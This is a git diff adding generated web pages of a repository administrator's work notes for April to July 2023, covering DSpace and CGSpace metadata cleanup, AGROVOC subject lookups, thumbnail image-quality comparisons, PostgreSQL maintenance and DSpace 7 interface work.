       Q75  Q80  Q92
JPEG    71   74   88
WebP    74   77   82
AVIF    82   83   86
+
    +
  • Then I checked the quality and file size (bytes) needed to hit an average ssimulacra2 score of 80 with each format: +
      +
    • JPEG: Q89, 124923 bytes
    • +
    • WebP: Q86, 84662 bytes (33% smaller than JPEG size)
    • +
    • AVIF: Q65, 67597 bytes (56% smaller than JPEG size)
    • +
    +
  • +
  • Google’s original WebP study uses this technique to compare WebP to JPEG too +
      +
    • As the quality settings are not comparable between formats, we need to compare the formats at matching perceptual scores (ssimulacra2 in this case)
    • +
    • I used a ssimulacra2 score of 80 because that’s about the highest score I see with WebP using my samples, though JPEG and AVIF do go higher
    • +
    • Also, according to current ssimulacra2 (v2.1), a score of 70 is “high quality” and a score of 90 is “very high quality”, so 80 should be high enough…
    • +
    +
  • +
  • Here is a plot of the qualities and ssimulacra2 scores:
  • +
+

Quality vs Score

+
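For reference, the comparison is essentially a loop like the sketch below. This is simplified (the real generation-loss.sh iterates over all thirty-five sample PDFs and averages the scores), the file names are made up, and it assumes ImageMagick was built with WebP and AVIF delegates and that the ssimulacra2 tool from libjxl is on the PATH:

for q in 75 80 92; do
    for ext in jpg webp avif; do
        # encode the reference image at the given quality in each format
        convert reference.png -quality $q "/tmp/sample-q${q}.${ext}"
        # decode back to PNG so ssimulacra2 scores the decoded result
        convert "/tmp/sample-q${q}.${ext}" "/tmp/sample-q${q}-${ext}.png"
        echo -n "${ext} Q${q}: "
        ssimulacra2 reference.png "/tmp/sample-q${q}-${ext}.png"
    done
done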
    +
  • Export CGSpace to check for missing Initiatives mappings
  • +
+

2023-04-22

+
    +
  • Export the Initiatives collection to run it through csv-metadata-quality +
      +
    • I wanted to make sure all the Initiatives items had correct regions (a typical csv-metadata-quality invocation is sketched after this list)
    • +
    • I had to manually fix a few license identifiers and ISSNs
    • +
    • Also, I found a few items submitted by MEL that had dates in DD/MM/YYYY format, so I sent them to Salem for him to investigate
    • +
    +
  • +
  • Start a harvest on AReS
  • +
+
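The region check itself is a single pass over the exported CSV with csv-metadata-quality; a typical invocation looks something like this (the file name is hypothetical, and -u enables the “unsafe” fixes such as adding missing regions, if I recall the flags correctly):

$ csv-metadata-quality -i /tmp/2023-04-22-initiatives.csv -o /tmp/2023-04-22-initiatives-cleaned.csv -u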

2023-04-26

+
    +
  • Begin working on the list of non-AGROVOC CGSpace subjects for FAO +
      +
    • The last time I did this was in 2022-06
    • +
    • I used the following SQL query to dump values from all subject fields, lower case them, and group by counts:
    • +
    +
  • +
+
localhost/dspacetest= ☘ \COPY (SELECT DISTINCT(lower(text_value)) AS "subject", count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (187, 120, 210, 122, 215, 127, 208, 124, 128, 123, 125, 135, 203, 236, 238, 119) GROUP BY "subject" ORDER BY count DESC) to /tmp/2023-04-26-cgspace-subjects.csv WITH CSV HEADER;
+COPY 26315
+Time: 2761.981 ms (00:02.762)
+
    +
  • Then I extracted the subjects and looked them up against AGROVOC:
  • +
+
$ csvcut -c subject /tmp/2023-04-26-cgspace-subjects.csv | sed '1d' > /tmp/2023-04-26-cgspace-subjects.txt
+$ ./ilri/agrovoc_lookup.py -i /tmp/2023-04-26-cgspace-subjects.txt -o /tmp/2023-04-26-cgspace-subjects-results.csv
+

2023-04-27

+
    +
  • The AGROVOC lookup from yesterday finished, so I extracted all terms that did not match and joined them with the original CSV so I can see the counts: +
      +
    • (I also note that the agrovoc_lookup.py script didn’t seem to be caching properly, as it had to look up everything again the next time I ran it despite the requests cache being 174MB!)
    • +
    +
  • +
+
csvgrep -c 'number of matches' -r '^0$' /tmp/2023-04-26-cgspace-subjects-results.csv \
+  | csvcut -c subject \
+  | csvjoin -c subject /tmp/2023-04-26-cgspace-subjects.csv - \
+  > /tmp/2023-04-26-cgspace-non-agrovoc.csv
+
    +
  • I filtered for only those terms that had counts larger than fifty +
      +
    • I also removed terms like “forages”, “policy”, “pests and diseases” because those exist as singular or separate terms in AGROVOC
    • +
    • I also removed ambiguous terms like “cocoa”, “diversity”, “resistance” etc because there are various other preferred terms for those in AGROVOC
    • +
    • I also removed spelling mistakes like “modeling” and “savanas” because those exist in their correct form in AGROVOC
    • +
    • I also removed internal CGIAR terms like “tac”, “crp”, “internal review”, etc. (note: these are mostly from the CGIAR System Office’s subjects… perhaps I should exclude those next time?)
    • +
    +
  • +
  • I note that many of our terms would match if they were singular, plural, or split up into separate terms, so perhaps we should pair this with an exercise to review our own terms
  • +
  • I couldn’t finish the work locally yet so I uploaded my list to Google Docs to continue later
  • +
+

2023-04-28

+
    +
  • The ImageMagick CMYK issue is bothering me still +
      +
    • I am on a plane currently, but I have a Docker image of ImageMagick 7.1.1-3 and I compared the output of all CMYK PDFs using the same command on my local machine (roughly as sketched at the end of this entry)
    • +
    • The images from the Docker environment are correct with only -colorspace sRGB (no profiles!) as the commenters on GitHub said
    • +
    • This leads me to believe something is wrong in my own environment, perhaps Ghostscript…?
    • +
    • The container has Ghostscript 9.53.3~dfsg-7+deb11u2 from Debian 11, while my Arch Linux system has Ghostscript 10.01.1-1
    • +
    +
  • +
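The comparison itself is simple, roughly as follows (the sample file name and the local Docker image tag are hypothetical, and it assumes the container has the ImageMagick CLI with a Ghostscript delegate):

# on my Arch host: ImageMagick 7.1.1 with Ghostscript 10.01.1
$ convert 'sample-cmyk.pdf[0]' -colorspace sRGB /tmp/host.jpg

# in the container: ImageMagick 7.1.1-3 with Ghostscript 9.53.3 from Debian 11
$ docker run --rm -v "$PWD:/work" -w /work imagemagick:7.1.1-3 \
    convert 'sample-cmyk.pdf[0]' -colorspace sRGB /work/container.jpg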
+ + + + + + +
+ + + +
+ + + + +
+
+ + + + + + + + + diff --git a/docs/2023-05/index.html b/docs/2023-05/index.html new file mode 100644 index 000000000..3d5f4a3d9 --- /dev/null +++ b/docs/2023-05/index.html @@ -0,0 +1,428 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + May, 2023 | CGSpace Notes + + + + + + + + + + + + + + + + + + + + + +
+
+ +
+
+ + + + +
+
+

CGSpace Notes

+

Documenting day-to-day work on the CGSpace repository.

+
+
+ + + + +
+
+
+ + + + +
+
+

May, 2023

+ +
+

2023-05-03

+
    +
  • Alliance’s TIP team emailed me to ask about issues authenticating on CGSpace +
      +
    • It seems their password expired, which is annoying
    • +
    +
  • +
  • I continued looking at the CGSpace subjects for the FAO / AGROVOC exercise that I started last week +
      +
    • There are many of our subjects that would match if they added a “-” like “high yielding varieties” or used singular…
    • +
    • Also I found at least two spelling mistakes, for example “decison support systems”, which would match if it was spelled correctly
    • +
    +
  • +
  • Work on cleaning, proofing, and uploading twenty-seven records for IFPRI to CGSpace
  • +
+
    +
  • I notice there are a few dozen locks from the dspaceWeb pool that are five days old on CGSpace so I killed them
  • +
+
$ psql < locks-age.sql | grep " days " | awk -F"|" '{print $10}' | sort -u | xargs kill
+

2023-05-04

+
    +
  • Sync DSpace Test with CGSpace
  • +
  • I replaced one item’s thumbnail with a WebP version and XMLUI displays it fine
  • +
  • I spent some time checking the CMYK issue with Arch’s ImageMagick 7 and the Docker container and I think ImageMagick 7 just handles CMYK wrong… +
      +
    • libvips does it correctly automatically and looks closer to the PDF
    • +
    +
  • +
  • Meeting about CG Core types
  • +
+

2023-05-10

+
    +
  • Write a script to find the metadata_field_id values associated with the non-AGROVOC subjects I am working on for Sara +
      +
    • This is useful because we want to know who to contact for a definition
    • +
    • The script was:
    • +
    +
  • +
+
while read -r subject; do
+    metadata_field_id=$(psql -h localhost -U postgres -d dspacetest -qtAX <<SQL
+        SELECT DISTINCT(metadata_field_id) FROM metadatavalue WHERE LOWER(text_value)='$subject'
+SQL
+)
+    metadata_field_id=$(echo $metadata_field_id | sed 's/[[:space:]]/||/g')
+
+    echo "$subject,$metadata_field_id"
+done < <(csvcut -c 1 ~/Downloads/2023-04-26\ CGIAR\ non-AGROVOC\ subjects.csv | sed 1d)
+
    +
  • I also realized that Bernard Bett didn’t have any items on CGSpace tagged with his ORCID identifier, so I tagged 230!
  • +
+

2023-05-11

+
    +
  • CG Core meeting
  • +
  • Finalize looking at the CGSpace non-AGROVOC subjects for FAO
  • +
+

2023-05-12

+
    +
  • Export the Alliance community to do some country/region fixes +
      +
    • I also sent Maria and Francesca the export because they want to add more regions and subregions
    • +
    +
  • +
  • Export the entire CGSpace to check for missing Initiative collection mappings +
      +
    • I also added missing regions
    • +
    +
  • +
+

2023-05-16

+ +

2023-05-17

+
    +
  • Re-sync CGSpace to DSpace 7 Test
  • +
  • I came up with a naive patch to use WebP instead of JPEG in the DSpace ImageMagick filter, and it works, but doesn’t replace existing JPEGs… hmmm +
      +
    • Also, it does PDF to WebP to WebP haha
    • +
    +
  • +
+

2023-05-18

+
    +
  • I created a pull request to improve some minor documentation, typo, and logic issues in the DSpace ImageMagick thumbnail filters
  • +
  • I realized that there is a quick win to the generation loss issue with ImageMagickThumbnailFilter +
      +
    • We can use ImageMagick’s internal MIFF format instead of JPEG when writing the intermediate image (see the sketch after this list)
    • +
    • According to the libvips author PNG is very slow!
    • +
    • I re-ran my generation-loss.sh script using MIFF and found that it had essentially the same results as PNG, which is about 1.1 points higher on the ssimulacra2 (v2.1) scoring scale
    • +
    • Also, according to my tests with the cosmo rusage.com utility, I see that MIFF is indeed much faster than PNG
    • +
    • I updated my pull request to add this quick win
    • +
    +
  • +
  • Weekly CG Core types meeting +
      +
    • Low attendance so I just kept working on the spreadsheet
    • +
    • We are at the stage of voting on definitions
    • +
    +
  • +
+
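To illustrate the MIFF idea outside of DSpace (the filter itself goes through im4java rather than the CLI, and these file names are hypothetical):

# current behaviour: a lossy JPEG intermediate, then a second lossy JPEG for the thumbnail
$ convert 'document.pdf[0]' -flatten /tmp/intermediate.jpg
$ convert /tmp/intermediate.jpg -thumbnail 300x300 /tmp/thumbnail.jpg

# quick win: a lossless MIFF intermediate, so the only lossy step is the final thumbnail encode
$ convert 'document.pdf[0]' -flatten /tmp/intermediate.miff
$ convert /tmp/intermediate.miff -thumbnail 300x300 /tmp/thumbnail.jpg

MIFF is ImageMagick’s native format and is lossless, which is why it scores essentially the same as PNG while being faster to write.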

2023-05-19

+
    +
  • I ported a few of the minor ImageMagick Thumbnail Filter improvements to our 6_x-prod branch
  • +
+

2023-05-20

+
    +
  • I deployed the latest thumbnail changes on CGSpace, ran all updates, and rebooted it
  • +
  • I exported CGSpace to check for missing Initiative mappings
  • +
  • Then I started a harvest on AReS
  • +
+

2023-05-23

+
    +
  • Help Francesca with an import of a journal article with a few hundred authors +
      +
    • I used the DSpace 7 live import from PubMed
    • +
    +
  • +
  • I also noticed a bug in the CrossRef live import if you change the DOI field, so I filed an issue
  • +
+

2023-05-25

+ +

2023-05-26

+ +
  • Export a list of DOIs for items whose original submission apparently contained only a GIF or JPEG bitstream (according to the provenance field), so I can try to replace those low-quality images with proper thumbnails:
\COPY (SELECT
+    text_value,
+    dspace_object_id
+FROM
+    metadatavalue
+WHERE
+    dspace_object_id IN (
+        SELECT
+            dspace_object_id
+        FROM
+            metadatavalue
+        WHERE
+            metadata_field_id = 28
+            AND place = 0
+            AND (text_value LIKE '%No. of bitstreams: 1%'
+                AND text_value SIMILAR TO '%.(gif|jpg|jpeg)%'))
+    AND metadata_field_id = 220) TO /tmp/items-with-old-bitstreams.csv WITH CSV HEADER;
+
    +
  • I extract the DOIs and look them up on CrossRef to see which are CC-BY, then extract those:
  • +
+
$ csvcut -c text_value /tmp/items-with-old-bitstreams.csv | sed 1d > /tmp/dois.txt
+$ ./ilri/crossref_doi_lookup.py -i /tmp/dois.txt -e fuuu@example.com -o /tmp/dois-resolved.csv
+$ csvgrep -c license -m 'creativecommons' /tmp/dois-resolved.csv \
+    | csvgrep -c license -m 'by-nc-nd' --invert-match \
+    | csvcut -c doi \
+    | sed '2,$s_^\(.*\)$_https://doi.org/\1_' \
+    | sed 1d > /tmp/dois-for-cc-items-with-old-bitstreams.txt
+
    +
  • This results in 262 items that have DOIs that are CC-BY (but not ND) +
      +
    • This is a good starting point, but misses some that had low-quality thumbnails uploaded after they were added (ie, there’s no record of a bitstream in the provenance field)
    • +
    +
  • +
  • I ran the list through my Sci-Hub download script and filtered out a few that downloaded invalid PDFs (manually), then generated thumbnails for all of them:
  • +
+
$ ~/src/git/DSpace/ilri/get_scihub_pdfs.py -i /tmp/dois-for-cc-items-with-old-bitstreams.txt -o bitstreams.csv
+$ chrt -b 0 vipsthumbnail *.pdf --export-profile srgb -s 600x600 -o './%s.pdf.jpg[Q=02,optimize_coding,strip]'
+
    +
  • Then I joined the CSVs on the DOI column, filtered out any that we didn’t find PDFs for, and formatted the resulting CSV with an id, filename, and bundle column:
  • +
+
$ csvjoin -c doi bitstreams.csv /tmp/items-with-old-bitstreams.csv \
+    | csvgrep -c filename --invert-match -r '^$' \
+    | sed '1s/dspace_object_id/id/' \
+    | csvcut -c id,filename \
+    | sed -e '1s/^\(.*\)$/\1,bundle/' -e '2,$s/^\(.*\)$/\1.jpg__description:libvips thumbnail,THUMBNAIL/' > new-thumbnails.csv
+
    +
  • I did a dry run with ilri/post_bitstreams.py and it seems that most (all?) already have thumbnails from the last time I did a massive Sci-Hub check +
      +
    • So it seems the provenance field is not very reliable, and that was a waste of two hours…
    • +
    • I did discover, while originally posting WebP thumbnails, that the format doesn’t seem to be set correctly when uploading WebP via the REST API (it gets set to Unknown), but it does work when uploading via XMLUI
    • +
    • POSTing a JPG to the THUMBNAIL bundle sets the format to JPEG…
    • +
    • I am guessing that is a bug that I won’t bother troubleshooting since the DSpace 6.x REST API is deprecated
    • +
    +
  • +
+

2023-05-27

+
    +
  • Export CGSpace to check for missing Initiative collection mappings +
      +
    • Then I also ran the csv-metadata-quality tool on the Initiatives to do some easy fixes like country/region mapping and whitespace fixes
    • +
    +
  • +
  • Start a harvest on AReS
  • +
+

2023-05-29

+
    +
  • Re-create my local PostgreSQL 14 container:
  • +
+
$ podman rm dspacedb14
+$ podman pull docker.io/postgres:14-alpine
+$ podman run --name dspacedb14 -v dspacedb14_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d docker.io/postgres:14-alpine -c shared_buffers=1024MB -c random_page_cost=1.1
+
    +
  • Export CGSpace again to do some major cleanups in OpenRefine +
      +
    • I found a few countries that are in the ISO 3166-1 and UN M.49 lists, but not in ours so I added them to the list in input-forms.xml and regenerated the controlled vocabularies for the CGSpace Submission Guidelines
    • +
    • There were a handful of issues with ISSNs, ISBNs, DOIs, access status, licenses, and missing CGIAR Trust Fund donors for Initiatives outputs
    • +
    • This was about 455 items
    • +
    +
  • +
  • Helping the Alliance web team understand the DSpace REST API for determining which collection an item belongs to
  • +
+ + + + + + +
+ + + +
+ + + + +
+
+ + + + + + + + + diff --git a/docs/2023-06/index.html b/docs/2023-06/index.html new file mode 100644 index 000000000..421637f84 --- /dev/null +++ b/docs/2023-06/index.html @@ -0,0 +1,500 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + June, 2023 | CGSpace Notes + + + + + + + + + + + + + + + + + + + + + +
+
+ +
+
+ + + + +
+
+

CGSpace Notes

+

Documenting day-to-day work on the CGSpace repository.

+
+
+ + + + +
+
+
+ + + + +
+
+

June, 2023

+ +
+

2023-06-02

+
    +
  • Spend some time testing my post_bitstreams.py script to update thumbnails for items on CGSpace +
      +
    • Interestingly I found an item with a JFIF thumbnail and another with a WebP thumbnail…
    • +
    +
  • +
  • Meeting with Valentina, Stefano, and Sara about MODS metadata in CGSpace +
      +
    • They have experience with improving the MODS interface in MELSpace’s OAI-PMH for use with AGRIS and were curious if we could do the same in CGSpace
    • +
    • From what I can see we need to upgrade the MODS schema from 3.1 to 3.7 and then just add a bunch of our fields to the crosswalk
    • +
    +
  • +
+

2023-06-04

+
    +
  • Upgrade CGSpace to Ubuntu 22.04 +
      +
    • The upgrade was mostly normal, but I had to unhold the openjdk package in order for do-release-upgrade to run:
    • +
    +
  • +
+
# apt-mark unhold openjdk-8-jdk-headless:amd64 openjdk-8-jre-headless:amd64
+
    +
  • In 2022-11 an upstream Java update broke the DSpace 6 Handle server so we will have to pin this again after the upgrade to Ubuntu 22.04
  • +
  • After the upgrade I made sure CGSpace was working, then proceeded to upgrade PostgreSQL from 12 to 14, like I did on DSpace Test in 2023-03
  • +
  • Then I had to downgrade OpenJDK to fix the Handle server, using the packages I had previously downloaded for Ubuntu 20.04 because they no longer exist on Launchpad:
  • +
+
# dpkg -i openjdk-8-j*8u342-b07*.deb
+
    +
  • Export CGSpace to fix missing Initiative collection mappings
  • +
  • Start a harvest on AReS
  • +
  • Work on the DSpace 7 migration a bit more +
      +
    • I decided to rebase and drop all the submission form edits because they conflict every time upstream changes!
    • +
    +
  • +
+

2023-06-06

+
    +
  • Fix some incorrect ORCID identifiers for an Alliance author on CGSpace
  • +
  • Export our list of ORCID identifiers, resolve them, and update the records in CGSpace:
  • +
+
$ cat dspace/config/controlled-vocabularies/cg-creator-identifier.xml 2022-09-22-add-orcids.csv | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort -u > /tmp/2023-06-06-orcids.txt
+$ ./ilri/resolve_orcids.py -i /tmp/2023-06-06-orcids.txt -o /tmp/2023-06-06-orcids-names.txt -d
+$ ./ilri/update_orcids.py -i /tmp/2023-06-06-orcids-names.txt -db dspacetest -u dspace -p 'ffff' -m 247
+
    +
  • Start working on updating the MODS schema in CGSpace from 3.1 to 3.8 based on Stefano and Salem’s work last year
  • +
+

2023-06-08

+
    +
  • Continue working on the MODS schema mapping
  • +
  • Export CGSpace to check and update dcterms.extent fields +
      +
    • I normalized about 1,500 to use either “p. 1-6” or “5 p.” format
    • +
    • Also, I used this GREL expression to extract missing pages from the citation field: cells['dcterms.bibliographicCitation[en_US]'].value.match(/.*(pp?\.\s?\d+[-–]\d+).*/)[0]
    • +
    • This was over 4,000 items with a format like “p. 1-6” and “pp. 1-6” in the citation
    • +
    • I used another GREL expression to extract another 5,000: cells['dcterms.bibliographicCitation[en_US]'].value.match(/.*?(\d+\s+?[Pp]+\.).*/)[0]
    • +
    • This was for the format like “1 p.” (note we had to protect against the greedy .* in the beginning)
    • +
    +
  • +
  • I also did some work to capture a handful of missing DOIs and ISSNs, but it was only about 100 items and I will have to wait until the 10,000+ above finish importing
  • +
+

2023-06-09

+
    +
  • I see there are ~200 users in CGSpace that have registered with their CGIAR email address using a password as opposed to using Active Directory:
  • +
+
SELECT * FROM eperson WHERE email LIKE '%cgiar.org' AND netid IS NOT NULL AND password IS NOT NULL;
+
    +
  • I am wondering if I should delete their passwords and tell them to log in using LDAP instead +
      +
    • As an initial test I will reset a few accounts including my own that have passwords and salts:
    • +
    +
  • +
+
UPDATE eperson SET password=DEFAULT,salt=DEFAULT,digest_algorithm=DEFAULT WHERE netid IN ('axxxx', 'axxxx', 'bxxxx');
+
    +
  • I also decided to reset passwords/salts for CGIAR accounts that have not been active since 2021 (1.5 years ago):
  • +
+
UPDATE eperson  SET password=DEFAULT,salt=DEFAULT,digest_algorithm=DEFAULT WHERE email LIKE '%cgiar.org' AND netid IS NOT NULL AND password IS NOT NULL AND salt IS NOT NULL AND last_active < '2022-01-01'::date;
+
    +
  • This was about 100 accounts… +
      +
    • I will wait some more time before I decide what to do about the more current ones
    • +
    +
  • +
  • Add a few more ORCID identifiers to my list and tag them on CGSpace
  • +
+

2023-06-10

+
    +
  • Export CGSpace to check for missing Initiative mappings +
      +
    • Start a harvest on AReS
    • +
    +
  • +
+

2023-06-11

+
    +
  • File an issue on DSpace for the Content-Disposition bug causing images to get downloaded instead of opened inline
  • +
+

2023-06-12

+
    +
  • Export CGSpace to do some more work extracting volume and issue from citations for items where they are missing +
      +
    • I found and fixed over 7,000!
    • +
    • Then I found and extracted another 7,000 items with no extents (pages)
    • +
    • Then I replaced all occurrences of en dashes in page ranges with regular hyphens
    • +
    +
  • +
+

2023-06-13

+
    +
  • Last night I finally figured out how to do basic overrides to the simple item view in Angular
  • +
  • Add a handful of new ORCID identifiers to my list and tag them on CGSpace
  • +
  • Extract a list of all the proposed actions for CG Core output types and create a new issue for them on CG Core’s GitHub repository
  • +
  • Extract a list of all the proposed actions for CG Core output types for MARLO and create a new issue for them on MARLO’s GitHub repository
  • +
  • Meeting with Indira, Ryan, and Abenet to discuss plans for the DSpace 7 focus group
  • +
+

2023-06-14

+ +

2023-06-15

+
    +
  • A lot more work on DSpace 7 +
      +
    • I tested some pull requests and worked on the style of the item view and homepage
    • +
    +
  • +
+

2023-06-16

+ +

2023-06-17

+
    +
  • Export CGSpace to check for missing Initiative collection mappings +
      +
    • I also spent some time doing sanity checks on countries, regions, DOIs, and more
    • +
    +
  • +
  • I lowercased all our AGROVOC keywords in dcterms.subject:
  • +
+
dspace=# BEGIN;
+BEGIN
+dspace=*# UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=187 AND text_value ~ '[[:upper:]]';
+UPDATE 2392
+dspace=*# COMMIT;
+COMMIT
+
    +
  • Start a harvest on AReS
  • +
+

2023-06-19

+
    +
  • Today I started getting an error on DSpace 7 Test +
      +
    • The page loads, and then when it is almost done it goes blank to white with this in the console:
    • +
    +
  • +
+
ERROR DOMException: CSSStyleSheet.cssRules getter: Not allowed to access cross-origin stylesheet
+
    +
  • I restarted Angular, but it didn’t fix it
  • +
  • The yarn test:rest script shows everything OK, and I haven’t changed anything recently…
  • +
  • I re-compiled the Angular UI using the default theme and it was the same…
  • +
  • I tried in Firefox Nightly and it works… +
      +
    • So it must be something related to the browser
    • +
    • I tried clearing all the session storage / cookies and refreshing and it worked
    • +
    +
  • +
  • I switched back to the CGSpace theme and it happened again +
      +
    • I had a hunch it might be due to the GDPR cookie plugin in my browser, so I disabled that and then refreshed and it worked… hmmm
    • +
    +
  • +
  • Upload thumbnails for about 42 IITA Journal Articles after resolving their DOIs and making sure they were not CC ND +
      +
    • I fixed a few bugs in get_scihub_pdfs.py in the process
    • +
    +
  • +
+

2023-06-21

+
    +
  • Stefano got back to me about the MODS OAI-PMH schema test on DSpace Test + +
  • +
+

2023-06-25

+
    +
  • Export CGSpace to check for missing Initiative collection mappings
  • +
  • I wanted to start a harvest on AReS but I’ve seen the load on the server high for a few days and I’m not sure what it is +
      +
    • I decided to run all updates and reboot it since it’s Sunday anyway
    • +
    +
  • +
+

2023-06-26

+
    +
  • Since the new DSpace 7 will respect newlines in metadata fields I am curious to see how many of our abstracts have poor newlines +
      +
    • I exported CGSpace and used a custom text facet with this GREL expression in OpenRefine to count the number of newlines in each cell:
    • +
    +
  • +
+
value.split('\n').length()
+
    +
  • Also useful to check for general length of the text in the cell to make sure it’s a reasonably long string +
      +
    • I spent some time trying to find a pattern that I could use to identify “easy” targets, but there are so many exceptions that it will have to be done manually
    • +
    • I fixed a few dozen
    • +
    +
  • +
  • Do a bit of work on thumbnails on CGSpace
  • +
  • I’m trying to troubleshoot the Discovery error I get on DSpace 7:
  • +
+
java.lang.NullPointerException: Cannot invoke "org.dspace.discovery.configuration.DiscoverySearchFilterFacet.getIndexFieldName()" because the return value of "org.dspace.content.authority.DSpaceControlledVocabularyIndex.getFacetConfig()" is null
+
    +
  • I reverted to the default submission-forms.xml and the getFacetConfig() error goes away…
  • +
  • Kill some long-held locks on CGSpace PostgreSQL, as some users are complaining of slowness in archiving
  • +
  • I did some testing of the LDAP login issue related to groupmaps + +
  • +
  • I spent some time on working on Angular and I figured out how to add a custom Angular component to show the UN SDG Goal icons on DSpace 7
  • +
+

2023-06-27

+
    +
  • I debugged the NullPointerException and somehow it disappeared +
      +
    • It seems to be related to the external controlled vocabularies in the submission form
    • +
    • I removed them all, then added them all back, and now the issue is solved… hmmmm
    • +
    • Oh no, now they are gone again, sigh…
    • +
    +
  • +
+

2023-06-28

+
    +
  • Spent a lot of time debugging the browse indexes +
      +
    • Looking at the DSpace 7 demo API I see the four default browse indexes from dspace.cfg and the one default srsc one that gets automatically enabled from the <vocabulary>srsc</vocabulary> in the submission-forms.xml
    • +
    • The same API call on my test DSpace 7 configuration results in the HTTP 500 I’ve been seeing for some time, and I am pretty sure it’s due to the automagic configuration of hierarchical browses based on the submission form
    • +
    • Yes, if I remove them all from my submission form then this works: http://localhost:8080/server/api/discover/browses (a quick check of that endpoint is sketched after this list)
    • +
    • I went through each of our vocabularies and tested them one by one: +
        +
      • dcterms-subject: OK
      • +
      • dc-contributor-author: NO
      • +
      • cg-creator-identifier: NO
      • +
      • cg-contributor-affiliation: OK (and with facetType: "affiliation" in API response?!)
      • +
      • cg-contributor-donor: OK (facetType: "sponsorship")
      • +
      • cg-journal: NO
      • +
      • cg-coverage-subregion: NO
      • +
      • cg-species-breed: NO
      • +
      +
    • +
    • Now I need to figure out what it is about those five that causes them to not work!
    • +
    • Ah, after debugging with someone on the DSpace Slack, I realized that DSpace expects these vocabularies to have corresponding indexes configured in discovery.xml, and they must be added as search filters AND sidebar facets.
    • +
    +
  • +
+
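A quick way to see which browse indexes the backend exposes (and to reproduce the HTTP 500) is to query the endpoint directly; assuming the usual HAL response layout, something like:

$ curl -s 'http://localhost:8080/server/api/discover/browses' | jq -r '._embedded.browses[].id'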

2023-06-29

+ +
dspace=# BEGIN;
+BEGIN
+dspace=*# UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=187 AND text_value ~ '[[:upper:]]';
+UPDATE 53
+dspace=*# COMMIT;
+
    +
  • After more discussion about the NullPointerException related to browse options, I filed an issue
  • +
+

2023-06-30

+
    +
  • I added another custom component to display CGIAR Impact Area icons in the DSpace 7 test
  • +
+ + + + + + +
+ + + +
+ + + + +
+
+ + + + + + + + + diff --git a/docs/2023-07/index.html b/docs/2023-07/index.html new file mode 100644 index 000000000..939397835 --- /dev/null +++ b/docs/2023-07/index.html @@ -0,0 +1,209 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + July, 2023 | CGSpace Notes + + + + + + + + + + + + + + + + + + + + + +
+
+ +
+
+ + + + +
+
+

CGSpace Notes

+

Documenting day-to-day work on the CGSpace repository.

+
+
+ + + + +
+
+
+ + + + +
+
+

July, 2023

+ +
+

2023-07-01

+
    +
  • Export CGSpace to check for missing Initiative collection mappings
  • +
  • Start harvesting on AReS
  • +
+

2023-07-02

+
    +
  • Minor edits to the crossref_doi_lookup.py script while running some checks from 22,000 CGSpace DOIs
  • +
+

2023-07-03

+
    +
  • I analyzed the licenses declared by Crossref and found with high confidence that ~400 of ours were incorrect +
      +
    • I took the more accurate ones from Crossref and updated the items on CGSpace
    • +
    • I took a few hundred ISBNs as well for where we were missing them
    • +
    • I also tagged ~4,700 items with missing licenses as “Copyrighted; all rights reserved” based on their Crossref license status being TDM, mostly from Elsevier, Wiley, and Springer
    • +
    • Checking a dozen or so manually, I confirmed that if Crossref only has a TDM license then it’s usually copyrighted (could still be open access, but we can’t tell via Crossref)
    • +
    • I would be curious to write a script to check the Unpaywall API for open access status…
    • +
    • In the past I found that their license status was not very accurate, but the open access status might be more reliable
    • +
    +
  • +
  • More minor work on the DSpace 7 item views +
      +
    • I learned some new Angular template syntax
    • +
    • I created a custom component to show Creative Commons licenses on the simple item page
    • +
    • I also decided that I don’t like the Impact Area icons as a component because they don’t have any visual meaning
    • +
    +
  • +
+ + + + + + + +
+ + + +
+ + + + +
+
+ + + + + + + + + diff --git a/docs/2023/01/cpu-week.png b/docs/2023/01/cpu-week.png new file mode 100644 index 000000000..087d9e888 Binary files /dev/null and b/docs/2023/01/cpu-week.png differ diff --git a/docs/2023/01/jmx_dspace_sessions-year.png b/docs/2023/01/jmx_dspace_sessions-year.png new file mode 100644 index 000000000..5cbc61563 Binary files /dev/null and b/docs/2023/01/jmx_dspace_sessions-year.png differ diff --git a/docs/2023/01/postgres_connections_ALL-day.png b/docs/2023/01/postgres_connections_ALL-day.png new file mode 100644 index 000000000..b9c2fe966 Binary files /dev/null and b/docs/2023/01/postgres_connections_ALL-day.png differ diff --git a/docs/2023/04/quality-vs-score-ssimulacra-v2.1.png b/docs/2023/04/quality-vs-score-ssimulacra-v2.1.png new file mode 100644 index 000000000..55eccf90d Binary files /dev/null and b/docs/2023/04/quality-vs-score-ssimulacra-v2.1.png differ diff --git a/docs/404.html b/docs/404.html new file mode 100644 index 000000000..3efbc53a8 --- /dev/null +++ b/docs/404.html @@ -0,0 +1,149 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + CGSpace Notes + + + + + + + + + + + + + + + + + + + + + +
+
+ +
+
+ + + + +
+
+

CGSpace Notes

+

Documenting day-to-day work on the CGSpace repository.

+
+
+ + + + +
+
+
+ + + +
+
+

Page Not Found

+
+

Page not found. Go back home.

+
+ + + +
+ + + + +
+
+ + + + + + + + + diff --git a/docs/categories/index.html b/docs/categories/index.html new file mode 100644 index 000000000..133fc237f --- /dev/null +++ b/docs/categories/index.html @@ -0,0 +1,162 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + CGSpace Notes + + + + + + + + + + + + + + + + + + + + + + +
+
+ +
+
+ + + + +
+
+

CGSpace Notes

+

Documenting day-to-day work on the CGSpace repository.

+
+
+ + + + +
+
+
+ + + + + + + + + + + + + + + + + +
+ + + + +
+
